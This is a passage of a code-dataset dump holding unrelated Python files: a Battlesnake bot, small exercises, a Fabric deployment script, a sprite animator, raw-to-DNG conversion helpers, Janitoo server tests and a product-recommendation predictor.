dy\n\n#sorts min-max\ndef sortListByDist(unsorted):\n return sorted(unsorted, key=getDistance)\n\n\ndef findBestFood(orderedFoodList, orderedSnakeList):\n\n for i in range(0, len(orderedFoodList)):\n item = orderedFoodList[i]\n\n for j in range(0, len(orderedSnakeList)):\n if( getDistance(item, orderedSnakeList[j]) < getDistance(item, ourSnakeHead)):\n #someone is closer - ignore the food\n break\n else: #we are closer, go for this food\n return item #return the item position\n\n # we are not closest to any food, define default behaviour\n\n return orderedFoodList[0]\n\n\ndef check_left(location, board):\n if int(location[0]) > 0:\n if str(board[location[0] - 1][location[1]]['state']) == 'food' or str(board[location[0] - 1][location[1]]['state']) == 'empty':\n return False\n else:\n return True\n else:\n print(\"here\")\n return True\ndef check_right(location, board):\n if int(location[0]) < (len(board) - 1):\n if str(board[location[0] + 1][location[1]]['state']) == 'food' or str(board[location[0] + 1][location[1]]['state'] == 'empty'):\n return False\n else:\n return True\n else:\n print(\"here\")\n return True\n\ndef 
check_up(location, board):\n    if int(location[1]) > 0:\n        if str(board[location[0]][location[1] - 1]['state']) == 'food' or str(board[location[0]][location[1] - 1]['state']) == 'empty':\n            return False\n        else:\n            return True\n    else:\n        print(\"here\")\n        return True\ndef check_down(location, board):\n    if int(location[1]) < (len(board[0]) - 1):\n        if str(board[location[0]][location[1] + 1]['state']) == 'food' or str(board[location[0]][location[1] + 1]['state']) == 'empty':\n            return False\n        else:\n            return True\n    else:\n        print(\"here\")\n        return True\n\n@bottle.get('/')\ndef index():\n    return \"\"\"\n    <a href=\"https://github.com/sendwithus/battlesnake-python\">\n        battlesnake-python\n    </a>\n    \"\"\"\n\n\n@bottle.post('/start')\ndef start():\n    data = bottle.request.json\n\n    return json.dumps({\n        'name': snakeName,\n        'color': '#00ff00',\n        'head_url': 'http://cscusnake.herokuapp.com',\n        'taunt': 'battlesnake-python!'\n    })\n\n\ndef moveUp():\n    return json.dumps({\n        'move': 'up'\n    })\ndef moveDown():\n    return json.dumps({\n        'move': 'down'\n    })\ndef moveLeft():\n    return json.dumps({\n        'move': 'left'\n    })\ndef moveRight():\n    return json.dumps({\n        'move': 'right'\n    })\n\ndef checkFood(foodList, enemySnakePos):\n    global ourSnakeHead\n\n    orderedFoodList = sortListByDist(foodList)\n    orderedSnakeList = sortListByDist(enemySnakePos)\n\n    #get the best food to go for\n    foodPos = findBestFood(orderedFoodList, orderedSnakeList)\n\n    #determine which way to go here\n    return eachTurnMove(ourSnakeHead[0], ourSnakeHead[1], foodPos[0], foodPos[1], ourSnake[1][0], ourSnake[1][1])\n\n\n@bottle.post('/move')\ndef move():\n    data = bottle.request.json\n    #print (data)\n    food = data[\"food\"]\n    snakes = data[\"snakes\"]\n    board = data['board']\n\n    print (snakes)\n    print(\"Up \" + str((check_up(snakes[0]['coords'][0], board))))\n    print(\"Down \" + str((check_down(snakes[0]['coords'][0], board))))\n    print(\"Left \" + str((check_left(snakes[0]['coords'][0], board))))\n    print(\"Right \" + str((check_right(snakes[0]['coords'][0], board))))\n\n    global ourSnakeHead\n    global ourSnake\n    enemySnakeHeads = []\n    for i in range(0, len(snakes)):\n        if(snakes[i][\"name\"] == snakeName):\n            ourSnakeHead = snakes[i][\"coords\"][0] # set our snake head position\n            ourSnake = snakes[i][\"coords\"] # save our snake\n        else:\n            enemySnakeHeads.append(snakes[i][\"coords\"][0]) #add enemy snake head (append, since this is a list)\n\n    if(True):#if go for food\n        return checkFood(food, enemySnakeHeads)\n    elif(False): #not going for food\n        pass #do nothing, remove later\n    #more cases here\n\n    #default code - to be removed\n    return json.dumps({\n        'move': 'left',\n        'taunt': 'battlesnake-python!'\n    })\n\n#Callum doing things don't worry about this\ndef eachTurnMove(curX, curY, nextX, nextY, prevX, prevY):\n\n    #goal is to give in the current position\n    # (get that from the head and pass it in here)\n    #Step 1. Determine which is a greater change, the x or y\n    #Step 2. 
Move left or right depending on blahh\n\n\n #Check Goal positon for r, l, u, d\n #Check each for current moving direction\n #return the fitting stuffs\n\n dX = abs(curX - nextX)\n dY = abs(curY - nextY)\n\n\n #Goal position is to the right\n if(curX - nextX < 0 ):\n if(curX - prevX < 0 ):\n return moveRight()\n if(curX - prevX > 0 ):\n\n if( dY > 0):\n return moveUp()\n if( dY < 0):\n return moveDown()\n else:\n return moveRight()\n\n\n #Goal pos to the left\n\n if(curX - nextX > 0 ):\n if(curX - prevX > 0 ):\n return moveLeft()\n if(curX - prevX < 0 ):\n\n if( dY > 0):\n return moveUp()\n if( dY < 0):\n return moveDown()\n else:\n return moveLeft()\n\n #Goal pos to up\n\n if(curY - nextY < 0 ):\n if(curY - prevY < 0 ):\n return moveUp()\n if(curY - prevY > 0 ):\n\n if( dX < 0):\n return moveRight()\n if( dX > 0):\n return moveLeft()\n else:\n return moveUp()\n\n #Goal is to move down\n\n if(curY - nextY > 0 ):\n if(curY - prevY > 0 ):\n return moveDown()\n if(curY - prevY < 0 ):\n\n if( dX < 0):\n return moveRight()\n if( dX > 0):\n return moveLeft()\n else:\n return moveDown()\n\n #How to get head and head-1 coords\n\n\n\n\n\n\n@bottle.post('/end')\ndef end():\n data = bottle.request.json\n\n return json.dumps({})\n\n\ndef main():\n move()\n\nif __name__ == \"__main__\":\n move()\n\n# Expose WSGI app\napplication = bottle.default_app()\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"483015069","text":"array = [2,3,4,5,5,3,1,2,4]\n\ndef findOdd(arr):\n visited = dict()\n for e in arr:\n if str(e) in visited.keys():\n del visited[str(e)]\n else:\n visited[str(e)] = e\n \n return list(visited.items())[0][1]\n\nprint(findOdd(array.copy()))\n","sub_path":"Cracking the Coding Interview/01_Hash_Tables_and_Arrays/tempCodeRunnerFile.py","file_name":"tempCodeRunnerFile.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"372912430","text":"# --- Define your functions below! ---\n\n# --- Put your main program below! ---\ndef main():\n print(\"Here you'll write the sequence of your project.\")\n\n # If you want input from the user, you can use the following\n # Remember to press ctrl+C to stop the forever loop!\n # Take out the \"while True\" line if you don't want the loop\n while True:\n answer = input(\"You can respond by typing something here. \")\n print(\"You said\", answer)\n\n\n# DON'T TOUCH! 
Setup code that runs your main() function.\nif __name__ == \"__main__\":\n main()\n","sub_path":"Html, JavaScript, CSS/girlsWhoCodeGE-master/girlsWhoCodeGE-master/skeletonCode.py","file_name":"skeletonCode.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"164975638","text":"\nn=int(input(\"enter the size:\"))\npro = 2\n\ndef gen(n,pro):\n\n\tfor i in range(3,n+1):\n\t\ty=0\n\t\tfor j in range(1,i+1):\n\t\t\tx=i%j\n\t\t\tif x==0:\n\t\t\t\ty=y+1\n\t\tif y==2:\n\t\t\tprint(i)\n\t\t\tpro=pro*i\n\n\tprint(pro)\n\ngen(n,pro);\t\n\n\n\t\n\n\n","sub_path":"prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"123011777","text":"#!/usr/bin/python3\n\"\"\" Transfers file from local to remote \"\"\"\nfrom fabric.api import *\nimport datetime\n\n\nenv.use_ssh_config = True\nenv.hosts = ['35.237.82.133', '35.196.231.32']\nenv.user = 'ubuntu'\nenv.key_filename = '~/.ssh/holberton'\ndate = datetime.datetime.now().strftime(\"%Y%m%d%I%M%S\")\n\n\ndef transfer():\n \"\"\" transfers a specific file \"\"\"\n put('./0-setup_web_static.sh', '/tmp/')\n\n\ndef do_pack():\n \"\"\"\n Generates a .tgz archive from the contents of web_static folder\n Return: the archive path if the archive has been correctly generated\n Otherwise Return: None\n \"\"\"\n local(\"mkdir -p ./versions\")\n res = local(\"tar czvf ./versions/web_static_{}.tgz\\\n ./web_static/*\".format(date))\n if res.succeeded:\n return \"./versions/web_static_{}.tgz\".format(date)\n else:\n return None\n\n\ndef do_deploy(archive_path):\n \"\"\" Distributes an archive to multiple webservers \"\"\"\n try:\n if not archive_path:\n return False\n try:\n name = archive_path.split('/')[-1]\n except:\n name = archive_path\n\n put(archive_path, '/tmp/')\n run(\"mkdir -p /data/web_static/releases/{}/\".format(name[:-4]))\n with cd('/tmp/'):\n run('tar xzf {} -C /data/web_static/releases/{}/'.format(name,\n name[:-4]))\n sudo('rm ./{}'.format(name))\n with cd('/data/web_static/'):\n run('mv releases/{}/web_static/*\\\n /data/web_static/releases/{}/'\n .format(name[:-4], name[:-4]))\n run('rm -rf ./current')\n run('ln -s /data/web_static/releases/{}/\\\n /data/web_static/current'.format(name[:-4]))\n return True\n except:\n return False\n\n\ndef deploy():\n \"\"\" Fabric Script: Distributes an archive to the web servers\n \"\"\"\n \"\"\"call do_pack and store the path of the created archive\n return false if no archive has been created\n call do_deploy(archive_path) using the new path of the new archive\n return the value of do_deploy\n \"\"\"\n\n path = do_pack()\n if path is None:\n return False\n result = do_deploy(path)\n return result\n","sub_path":"3-deploy_web_static.py","file_name":"3-deploy_web_static.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"254783197","text":"import pandas as pd\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import mean_absolute_error, r2_score, mean_squared_error\r\nimport numpy as np\r\nfrom sklearn.linear_model import Lasso, Ridge\r\n\r\n\r\ndf = pd.read_csv('energydata_complete.csv')\r\nnew_df = df.drop(columns = ['date','lights'])\r\n\r\none_df = 
new_df[['T2','T6','Appliances']]\r\n\r\nscaler = MinMaxScaler()\r\nnorm_df = pd.DataFrame(scaler.fit_transform(new_df), columns=new_df.columns)\r\nfeatures = norm_df.drop(columns = 'Appliances')\r\ntarget = norm_df['Appliances']\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(features, target, test_size=0.3, random_state=42)\r\nlinear_model = LinearRegression()\r\nlinear_model.fit(x_train,y_train)\r\npredict = linear_model.predict(x_test)\r\n\r\nr2 = r2_score(y_test, predict)  # store under a new name to avoid shadowing the imported r2_score\r\nround(r2, 2)\r\n\r\nmae = mean_absolute_error(y_test, predict)\r\nround(mae, 2)\r\n\r\nrss = np.sum(np.square(y_test - predict))\r\nround(rss, 2)\r\n\r\nrmse = np.sqrt(mean_squared_error(y_test, predict))\r\nround(rmse, 3)\r\n\r\ndef get_weights_df(model, feat, col_name):\r\n    #this function returns the weight of every feature\r\n    weights = pd.Series(model.coef_, feat.columns).sort_values()\r\n    weights_df = pd.DataFrame(weights).reset_index()\r\n    weights_df.columns = ['Features', col_name]\r\n    weights_df[col_name].round(3)\r\n    return weights_df\r\n\r\n# fit the ridge and lasso regressions whose weights are compared below (default hyperparameters)\r\nridge_reg = Ridge()\r\nridge_reg.fit(x_train, y_train)\r\nlasso_reg = Lasso()\r\nlasso_reg.fit(x_train, y_train)\r\n\r\nlinear_model_weights = get_weights_df(linear_model, x_train, 'Linear_Model_Weight')\r\nridge_weights_df = get_weights_df(ridge_reg, x_train, 'Ridge_Weight')\r\nlasso_weights_df = get_weights_df(lasso_reg, x_train, 'Lasso_weight')\r\n\r\nfinal_weights = pd.merge(linear_model_weights, ridge_weights_df, on='Features')\r\nfinal_weights = pd.merge(final_weights, lasso_weights_df, on='Features')\r\nfinal_weights\r\n","sub_path":"hamoye_quiz.py","file_name":"hamoye_quiz.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"599091222","text":"\"\"\"\nAnimator Class\nWorks with single sprite sheet and an atlas file\n\nCreated: Jul 30, 2018\n@author: rmainer\n\"\"\"\nimport pygame\n\n\ndef prepare_animations(spritesheet_file, atlas_file, sprite_size=None):\n\n    sprite_sheet = pygame.image.load(spritesheet_file).convert_alpha()\n\n    if atlas_file is None:\n        atlas_file = spritesheet_file.replace(\"png\", \"txt\")\n    \n    with open(atlas_file, \"r\") as f:\n        lines = f.readlines()  # read entire file\n\n    animation_dictionary = {}\n\n    for line in lines:\n        # Line example: air-attack1-00 = 0 38 50 37\n        action_key, rect_vals = line.split(\" = \")  # (air-attack1-00, 0 38 50 37)\n        action = action_key.split(\"-\")[:-1]  # [air, attack1]\n\n        if len(action) > 1:\n            action = \"-\".join(action)  # air-attack1\n        else:\n            action = action[0]  # action is list...\n\n        if action not in animation_dictionary.keys():\n            animation_dictionary[action] = []  # create a new list of sprites\n\n        r = pygame.Rect(tuple([int(s) for s in rect_vals.split(' ')]))  # create a rect for sprite in sheet\n        sprite = sprite_sheet.subsurface(r)  # get sprite as subsurface\n\n        if sprite_size is not None:\n            sprite = pygame.transform.scale(sprite, sprite_size)\n\n        animation_dictionary[action].append(sprite)  # add to list\n\n    return animation_dictionary\n\n\nclass Animator(object):\n\n    def __init__(self, spritesheet_file, atlas_file=None, sprite_size=None):\n        self.__animation_dict = prepare_animations(spritesheet_file, atlas_file, sprite_size)\n        self.__animation_key = \"\"  # animation key (name)\n        self.__sprite_index = 0  # index of current sprite in animation list of sprites\n\n    def get_animation_key(self):\n        return self.__animation_key\n\n    def get_sprite_index(self):\n        return self.__sprite_index\n\n    def flip_sprites_ver(self):\n        \"\"\"\n        Flips the x axis of the sprites in the animation dict\n        \"\"\"\n        for action_key, 
sprites_list in self.__animation_dict.items():\n for i in range(0, len(sprites_list)):\n sprite = sprites_list[i]\n self.__animation_dict[action_key][i] = pygame.transform.flip(sprite, True, False)\n return self.__animation_dict\n\n def get_next_sprite(self, animation_key: str) -> pygame.Surface:\n \"\"\"\n Returns the next sprite in the animation\n :param animation_key:\n :return: surface\n \"\"\"\n\n if animation_key != self.__animation_key:\n # if changed to new animation, update key and reset sprite index\n self.__animation_key = animation_key\n self.__sprite_index = 0\n else:\n self.__sprite_index += 1\n if self.__sprite_index == len(self.__animation_dict[self.__animation_key]):\n self.__sprite_index = 0\n\n return self.__animation_dict[self.__animation_key][self.__sprite_index]\n\n def get_last_sprite(self) -> pygame.Surface:\n \"\"\"\n Returns the last sprite in sprite list\n For example, if character died\n :return: surface\n \"\"\"\n return self.__animation_dict[self.__animation_key][-1]\n\n def reset_animation(self):\n self.__sprite_index = 0\n\n\nif __name__ == \"__main__\":\n import os\n\n SCREEN_SIZE = (480, 320)\n FPS = 60\n BLACK = (0, 0, 0)\n SPRITE_SHEET = os.path.join(\"..\", \"Assets\", \"adventurer_sprite_sheet.png\")\n ATLAS = os.path.join(\"..\", \"Assets\", \"adventurer_sprite_sheet.txt\")\n SIZE = (200, 148)\n ACTION = \"bow\"\n INTERVAL = .10 # how long one single sprite should be displayed in seconds\n\n pygame.init()\n screen = pygame.display.set_mode(SCREEN_SIZE)\n clock = pygame.time.Clock()\n playtime = 0\n cycletime = 0\n\n animator = Animator(SPRITE_SHEET, ATLAS, sprite_size=SIZE)\n\n while 1:\n milliseconds = clock.tick(FPS) # ms passed since last tick/frame\n seconds = milliseconds / 1000.0 # seconds since last tick/frame\n playtime += seconds\n cycletime += seconds\n if cycletime > INTERVAL:\n image = animator.get_next_sprite(ACTION)\n size = image.get_rect().size\n screen.fill(BLACK)\n screen.blit(image, (SCREEN_SIZE[0]/2 - size[0]/2, SCREEN_SIZE[1]/2 - size[1]/2))\n cycletime = 0\n\n pygame.display.set_caption(\"[FPS]: %.2f picture: %i\" % (clock.get_fps(), animator.get_sprite_index()))\n pygame.display.flip()\n","sub_path":"Graphics/Animator.py","file_name":"Animator.py","file_ext":"py","file_size_in_byte":4474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"339530695","text":"#\n# @lc app=leetcode id=416 lang=python3\n#\n# [416] Partition Equal Subset Sum\n#\nclass Solution:\n def canPartition(self, nums: List[int]) -> bool:\n if not nums:\n return False\n s = sum(nums)\n if s%2: return False\n target = s // 2\n dp = [[False for _ in range(target+1)] for _ in range(len(nums)+1)]\n dp[0][0] = True\n for i in range(1, len(nums)+1):\n dp[i][0] = True\n for i in range(1, len(nums)+1):\n for j in range(1, target+1):\n if j >= nums[i-1]:\n dp[i][j] = dp[i-1][j]| dp[i-1][j-nums[i-1]]\n ### dp[i-1][j]: feasible without putting nums[i-1] into the subset\n ### dp[i-1][j-nums[i-1]]: feasible when nums[i-1] is put into the subset\n else:\n dp[i][j] = dp[i-1][j]\n return dp[-1][-1]\n\n\n","sub_path":"416.partition-equal-subset-sum.py","file_name":"416.partition-equal-subset-sum.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"375506730","text":"from PyQt5.QtWidgets import QMainWindow, QApplication, QMessageBox\nfrom PyQt5 import uic\n\n\nclass MiVentana(QMainWindow):\n def __init__(self):\n super().__init__()\n uic.loadUi(\"message_box.ui\", self)\n 
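 # note: loadUi exposes each widget defined in message_box.ui as an attribute named after its objectName, so 'mensaje' below is assumed to be a QPushButton declared in that .ui file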
self.mensaje.clicked.connect(self.on_mensaje)\n\n def on_mensaje(self):\n msg = QMessageBox()\n msg.setWindowTitle('Titulo de mensaje')\n msg.setText('Este es un mensaje')\n # msg.setIcon(QMessageBox.Critical)\n # msg.setIcon(QMessageBox.Warning)\n # msg.setIcon(QMessageBox.Information)\n msg.setIcon(QMessageBox.Question)\n # msg.setStandardButtons(\n # QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel | QMessageBox.Ok | QMessageBox.Open | QMessageBox.Close | QMessageBox.Save | QMessageBox.SaveAll | QMessageBox.Abort | QMessageBox.Retry | QMessageBox.Ignore)\n msg.setStandardButtons(\n QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel)\n\n respuesta = msg.exec_()\n if respuesta == QMessageBox.Yes:\n print('Se eligio si')\n elif respuesta == QMessageBox.No:\n print('Se eligio no')\n else:\n print('Se eligio cancelar')\n\n\napp = QApplication([])\n\nwin = MiVentana()\nwin.show()\n\napp.exec_()\n","sub_path":"Python/PyQT5/Elementos/Message_Box/message_box.py","file_name":"message_box.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"615205871","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nConversion Process\n==================\n\nDefines the conversion process objects:\n\n- :func:`convert_raw_files_to_dng_files`\n- :func:`convert_dng_files_to_intermediate_files`\n\"\"\"\n\nfrom __future__ import division, unicode_literals\n\nimport logging\nimport os\nimport platform\nimport re\nimport shlex\nimport subprocess\n\nfrom colour_hdri.utilities import path_exists\n\n__author__ = 'Colour Developers'\n__copyright__ = 'Copyright (C) 2015-2016 - Colour Developers'\n__license__ = 'New BSD License - http://opensource.org/licenses/BSD-3-Clause'\n__maintainer__ = 'Colour Developers'\n__email__ = 'colour-science@googlegroups.com'\n__status__ = 'Production'\n\n__all__ = ['RAW_CONVERTER',\n 'RAW_CONVERSION_ARGUMENTS',\n 'RAW_D_CONVERSION_ARGUMENTS',\n 'DNG_CONVERTER',\n 'DNG_CONVERSION_ARGUMENTS',\n 'convert_raw_files_to_dng_files',\n 'convert_dng_files_to_intermediate_files']\n\nLOGGER = logging.getLogger(__name__)\n\nRAW_CONVERTER = 'dcraw'\n\"\"\"\nCommand line raw conversion application, usually Dave Coffin's *dcraw*.\n\nRAW_CONVERTER : unicode\n\"\"\"\n\nRAW_CONVERSION_ARGUMENTS = '-t 0 -D -W -4 -T \"{0}\"'\n\"\"\"\nArguments for the command line raw conversion application for non demosaiced\nlinear *tiff* file format output.\n\nRAW_CONVERSION_ARGUMENTS : unicode\n\"\"\"\n\nRAW_D_CONVERSION_ARGUMENTS = '-t 0 -H 1 -r 1 1 1 1 -4 -q 3 -o 0 -T \"{0}\"'\n\"\"\"\nArguments for the command line raw conversion application for demosaiced\nlinear *tiff* file format output.\n\nRAW_D_CONVERSION_ARGUMENTS : unicode\n\"\"\"\n\nif platform.system() in ('Windows', 'Microsoft'):\n DNG_CONVERTER = 'C:\\\\Program Files (x86)\\\\Adobe\\\\Adobe DNG Converter.exe'\n \"\"\"\n Command line *DNG* conversion application, usually *Adobe DNG Converter*.\n\n DNG_CONVERTER : unicode\n \"\"\"\nelif platform.system() == 'Darwin':\n DNG_CONVERTER = ('/Applications/Adobe DNG Converter.app/Contents/'\n 'MacOS/Adobe DNG Converter')\n \"\"\"\n Command line *dng* conversion application, usually *Adobe DNG Converter*.\n\n DNG_CONVERTER : unicode\n \"\"\"\nelse:\n DNG_CONVERTER = None\n \"\"\"\n Command line *dng* conversion application, usually *Adobe DNG Converter*.\n\n DNG_CONVERTER : unicode\n \"\"\"\n\nDNG_CONVERSION_ARGUMENTS = '-e -d \"{0}\" \"{1}\"'\n\"\"\"\nArguments for the command line *dng* conversion 
application.\n\nDNG_CONVERSION_ARGUMENTS : unicode\n\"\"\"\n\n\ndef convert_raw_files_to_dng_files(raw_files, output_directory):\n \"\"\"\n Converts given raw files to *dng* files using given output directory.\n\n Parameters\n ----------\n raw_files : array_like\n Raw files to convert to *dng* files.\n output_directory : unicode\n Output directory.\n\n Returns\n -------\n list\n *dng* files.\n \"\"\"\n\n dng_files = []\n for raw_file in raw_files:\n raw_file_extension = os.path.splitext(raw_file)[1]\n dng_file = os.path.join(output_directory, os.path.basename(\n re.sub('{0}$'.format(raw_file_extension), '.dng', raw_file)))\n\n path_exists(dng_file) and os.remove(dng_file)\n\n LOGGER.info(\n 'Converting \"{0}\" file to \"{1}\" file.'.format(raw_file, dng_file))\n\n command = [DNG_CONVERTER] + shlex.split(\n DNG_CONVERSION_ARGUMENTS.format(output_directory, raw_file),\n posix=(False\n if platform.system() in (\"Windows\", \"Microsoft\") else\n True))\n\n subprocess.call(command)\n\n dng_files.append(dng_file)\n\n return dng_files\n\n\ndef convert_dng_files_to_intermediate_files(dng_files,\n output_directory,\n demosaicing=False):\n \"\"\"\n Converts given *dng* files to intermediate *tiff* files using given output\n directory.\n\n Parameters\n ----------\n dng_files : array_like\n *dng* files to convert to intermediate *tiff* files.\n output_directory : str\n Output directory.\n demosaicing : bool\n Perform demosaicing on conversion.\n\n Returns\n -------\n list\n Intermediate *tiff* files.\n \"\"\"\n\n intermediate_files = []\n for dng_file in dng_files:\n intermediate_file = re.sub('\\.dng$', '.tiff', dng_file)\n\n path_exists(intermediate_file) and os.remove(intermediate_file)\n\n LOGGER.info('Converting \"{0}\" file to \"{1}\" file.'.format(\n dng_file, intermediate_file))\n\n raw_conversion_arguments = (RAW_D_CONVERSION_ARGUMENTS\n if demosaicing else\n RAW_CONVERSION_ARGUMENTS)\n command = [RAW_CONVERTER] + shlex.split(\n raw_conversion_arguments.format(dng_file),\n posix=(False\n if platform.system() in (\"Windows\", \"Microsoft\") else\n True))\n\n subprocess.call(command)\n\n tiff_file = os.path.join(\n output_directory, os.path.basename(intermediate_file))\n if tiff_file != intermediate_file:\n path_exists(tiff_file) and os.remove(tiff_file)\n os.rename(intermediate_file, tiff_file)\n\n intermediate_files.append(tiff_file)\n\n return intermediate_files\n","sub_path":"colour_hdri/process/conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":5216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"174678185","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom rest_framework import routers\nfrom probability_calculator import views\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'physical_objects', views.PhysicalObjectViewSet)\nrouter.register(\n r'probabilities',\n views.ProbabilityViewSet,\n base_name='probability',\n)\nurlpatterns = router.urls\n\nurlpatterns += [\n url(r'^admin/', include(admin.site.urls)),\n]\n","sub_path":"tunneling_probabilities/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"411885990","text":"#Write a Python script to check if a given key already exists in a dictionary \n\ndic = {\"Student1\":\"Hafeez\",\"Student2\":\"Sameer\",\"Student3\":\"Asad\",\"Student4\":\"Mehmood\",\"Student5\":\"Hamza\"}\nduplicate = 
{}\nprint(dic)\nkey = \"Student1\"\nif key in dic.keys(): \n print(key,\" is present and his name is \",dic[key])\nelse:\n print(\"Not present\")","sub_path":"assignment_3/answer_6.py","file_name":"answer_6.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"578861299","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Unittests for Janitoo-Raspberry Pi Server.\n\"\"\"\n__license__ = \"\"\"\n This file is part of Janitoo.\n\n Janitoo is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n Janitoo is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with Janitoo. If not, see <http://www.gnu.org/licenses/>.\n\n\"\"\"\n__author__ = 'Sébastien GALLET aka bibi21000'\n__email__ = 'bibi21000@gmail.com'\n__copyright__ = \"Copyright © 2013-2014-2015-2016 Sébastien GALLET aka bibi21000\"\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport time\n\nfrom janitoo_nosetests.server import JNTTServer, JNTTServerCommon\nfrom janitoo.utils import HADD_SEP, HADD\nfrom janitoo.thread import JNTBusThread\nfrom janitoo_raspberry.server import PiServer\n\nclass TestTutorialServer(JNTTServer, JNTTServerCommon):\n \"\"\"Test the tutorial server\n \"\"\"\n server_class = PiServer\n server_conf = \"tests/data/helloworldv4.conf\"\n server_section = \"tutorial4\"\n\n hadds = [HADD%(225,0), HADD%(225,1), HADD%(225,2), HADD%(225,3), HADD%(225,4)]\n\n def test_040_server_start_no_error_in_log(self):\n self.onlyRasperryTest()\n JNTTServerCommon.test_040_server_start_no_error_in_log(self)\n\n def test_100_server_start_machine_state(self):\n self.start()\n time.sleep(10)\n thread = self.server.find_thread(self.server_section)\n self.assertNotEqual(thread, None)\n self.assertIsInstance(thread, JNTBusThread)\n bus = thread.bus\n self.assertNotEqual(bus, None)\n self.waitHeartbeatNodes(hadds=self.hadds)\n self.assertFsmBoot()\n bus.wakeup()\n time.sleep(2)\n bus.sleep()\n time.sleep(2)\n bus.report()\n time.sleep(15)\n bus.ring()\n time.sleep(15)\n bus.report()\n time.sleep(2)\n bus.sleep()\n","sub_path":"tests/test_server_v4.py","file_name":"test_server_v4.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"195528260","text":"import time\nimport re,urbandict\n\nfrom lib import Plugin\nplgn = Plugin('dictionay')\n\n\n@plgn.command('define (?P<what>[-a-zA-Z]+)')\ndef temp(data, what):\n\tfinal=\"\"\n\td=urbandict.define(str(what))\n\tfor item in d:\n\t\tfinal =final + item['def'] \n\treturn final\n\n@plgn.command('use (?P<what>[-a-zA-Z]+)')\ndef temp(data, what):\n\tfinal=\"\"\n\td=urbandict.define(str(what))\n\tfor item in d:\n\t\tfinal =final + item['example'] \n\treturn final\n","sub_path":"plugins/repeat/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"574204973","text":"import yaml\nfrom utils import load_data, trim_id\nfrom logic.data_preparation import 
prepare_unlabeled_data\nfrom logic.prediction import get_recommended_product \n\n\nclass Predictor():\n def __init__(self, config_path='config/step3_prediction.yaml'):\n # General attributes\n with open(config_path) as stream:\n self.config = yaml.safe_load(stream)\n \n self.complete_data = \\\n load_data(self.config['input']['complete_data_path'])\n self.data = load_data(self.config['input']['data_path'])\n self.model = load_data(self.config['input']['model_path'])\n self.encoders = load_data(self.config['input']['encoder_path'])\n self.columns_dict = \\\n load_data(self.config['input']['classifier_columns_path'])\n\n self.product_recommendation_tables = \\\n load_data(self.config['input']['product_recommendation_table_path'])\n\n def predict_category_random(self, sample_size=5, to_print=True):\n sample = self.complete_data.sample(n=sample_size, random_state=None)\n # Generates product category prediction for a random sample \n # of the complete data\n prepared_data = prepare_unlabeled_data(sample, self.columns_dict, \n self.encoders)\n \n if to_print:\n print(f'Running prediction for sample:\\n{sample}')\n predictions = self.model.predict(prepared_data)\n \n label_encoder = self.encoders['label_encoder']\n predictions_string = \\\n label_encoder.inverse_transform(predictions.astype(int))\n if to_print:\n print(f'\\nPredictions:\\n{predictions_string}')\n \n sample['predicted_category'] = predictions_string\n\n return sample\n\n def predict_product_random(self, sample_size=2, product_number=3, estimation_n=5):\n category_predictions = \\\n self.predict_category_random(sample_size=sample_size,\n to_print=False)\n recommendations = {}\n for _, row in category_predictions.iterrows():\n recommendation = get_recommended_product(row, self.complete_data,\n self.product_recommendation_tables,\n product_number=product_number,\n estimation_n=estimation_n)\n\n recommendations[row['customer_unique_id']] = recommendation\n\n return category_predictions, recommendations\n\n def print_product_recommendation(self, sample_size=2, verbose=False,\n product_number=3, estimation_number=5):\n # Prints predictions per customer for a given sample size\n # Based on verbosity it will either print previous category, predicted\n # category and recommended product information, or it will print all the\n # customer's order info and other features as well.\n category_prediction, recommendations = \\\n 